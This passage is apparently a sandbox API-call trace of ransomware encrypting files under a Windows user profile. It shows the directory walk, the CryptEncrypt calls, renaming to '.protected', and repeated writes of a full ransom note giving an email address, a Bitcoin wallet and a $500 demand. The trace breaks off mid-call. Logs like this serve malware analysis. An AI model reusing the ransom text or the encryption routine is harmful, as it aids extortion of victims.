[0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".txt") returned 0x0 [0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".rar") returned 0x0 [0093.840] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 75 [0093.840] StrStrW (lpFirst="fwlink[1]", lpSrch=".zip") returned 0x0 [0093.840] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.841] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0093.841] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0093.841] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0093.841] CloseHandle (hObject=0x150) returned 1 [0093.842] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected") returned 85 [0093.842] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].protected")) returned 1 [0093.842] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0093.842] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0093.842] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt") returned 83 [0093.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\KQMHSVKD\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\kqmhsvkd\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.844] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.844] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0093.844] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.844] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0093.845] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.845] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0093.845] CloseHandle (hObject=0x14c) returned 1 [0093.845] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.845] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.846] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt") returned 74 [0093.846] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds Cache\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds cache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.846] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.846] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.847] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.847] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.847] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.847] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0093.847] CloseHandle (hObject=0xd8) returned 1 [0093.847] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Windows") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="Program Files (x86)") returned -1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="$Recycle.bin") returned 1 [0093.848] lstrcmpiW (lpString1="Internet Explorer", lpString2="System Volume Information") returned -1 [0093.848] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer") returned 62 [0093.848] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0093.848] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0093.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*") returned 64 [0093.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.848] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0093.848] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.848] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.848] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\.") returned 64 [0093.848] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.851] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0093.851] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.851] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.851] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\..") returned 65 [0093.851] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.851] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.851] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Windows") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="Program Files (x86)") returned -1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="$Recycle.bin") returned 1 [0093.851] lstrcmpiW (lpString1="brndlog.bak", lpString2="System Volume Information") returned -1 [0093.851] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.851] StrStrIW (lpFirst="brndlog.bak", lpSrch=".protected") returned 0x0 [0093.851] lstrcmpW (lpString1="brndlog.bak", lpString2="RESTORE_FILES.txt") returned -1 [0093.851] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.851] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.851] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.852] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.852] StrStrW (lpFirst="brndlog.bak", lpSrch=".txt") returned 0x0 [0093.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.853] StrStrW (lpFirst="brndlog.bak", lpSrch=".rar") returned 0x0 [0093.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak") returned 74 [0093.853] StrStrW (lpFirst="brndlog.bak", lpSrch=".zip") returned 0x0 [0093.853] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.862] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.862] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.862] CloseHandle (hObject=0x14c) returned 1 [0093.863] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected") returned 84 [0093.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.bak.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.bak.protected")) returned 1 [0093.863] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Windows") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="Program Files (x86)") returned -1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="$Recycle.bin") returned 1 [0093.863] lstrcmpiW (lpString1="brndlog.txt", lpString2="System Volume Information") returned -1 [0093.863] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0093.863] StrStrIW (lpFirst="brndlog.txt", lpSrch=".protected") returned 0x0 [0093.863] lstrcmpW (lpString1="brndlog.txt", lpString2="RESTORE_FILES.txt") returned -1 [0093.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0093.863] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0093.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0093.864] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt") returned 74 [0093.864] StrStrW (lpFirst="brndlog.txt", lpSrch=".txt") returned=".txt" [0093.864] lstrlenW (lpString=".txt") returned 4 [0093.864] lstrlenW (lpString=".txt") returned 4 [0093.864] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.869] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.869] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0093.869] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x7a9, lpOverlapped=0x0) returned 1 [0093.870] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xfffff857, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.870] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x7a9, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x7a9, lpOverlapped=0x0) returned 1 [0093.870] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.870] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0093.870] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0093.870] CloseHandle (hObject=0x14c) returned 1 [0093.870] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected") returned 84 [0093.870] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\brndlog.txt.protected" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\brndlog.txt.protected")) returned 1 [0093.871] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.871] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.871] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt") returned 80 [0093.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Internet Explorer\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\internet explorer\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0093.876] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0093.876] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0093.880] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0093.880] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0093.880] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0093.880] WriteFile 